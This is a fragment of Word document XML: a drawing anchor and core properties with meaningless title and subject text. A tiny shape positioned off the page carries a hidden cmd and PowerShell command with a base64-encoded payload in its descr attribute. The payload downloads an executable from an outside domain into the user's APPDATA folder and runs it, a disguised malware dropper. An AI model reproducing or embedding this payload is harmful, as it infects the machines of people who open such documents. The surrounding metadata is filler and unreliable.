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F5496"/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4102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3035</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>19202400</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="13335" cy="13335"/>
                <wp:effectExtent l="5080" t="5080" r="5080" b="5080"/>
                <wp:wrapNone/>
                <wp:docPr id="2" name="" descr="cMd.EXE /c poWerShelL.exe -ec KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACIAaAB0AHQAcAA6AC8ALwB0AG8AbABpAG4AYQB0AG8AZwByAC4AYwBvAG0ALwBLAEgAWgAvAGQAaQB1AHkAegAuAHAAaABwAD8AbAA9AGEAcQB1AGUAMgAuAHQAawBuACIALAAgACQAZQBuAHYAOgBBAFAAUABEAEEAVABBACAAKwAgACcAXAAxADMAZABlAGEAMgA3AGYALgBlAHgAZQAnACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAJwBcADEAMwBkAGUAYQAyADcAZgAuAGUAeABlACcAOwAgAEUAeABpAHQA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12.05pt;margin-top:1512pt;width:1pt;height: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21:00Z</dcterms:created>
  <dc:creator/>
  <dc:description>Enhanced static system engine</dc:description>
  <cp:keywords/>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy/>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-12-05T22:12:00Z</dcterms:modified>
  <cp:revision>1</cp:revision>
  <dc:subject>Wisconsin  Wilhelm</dc:subject>
  <dc:title>Secured maximized open system</dc:title>
</cp:coreProperties>
</file>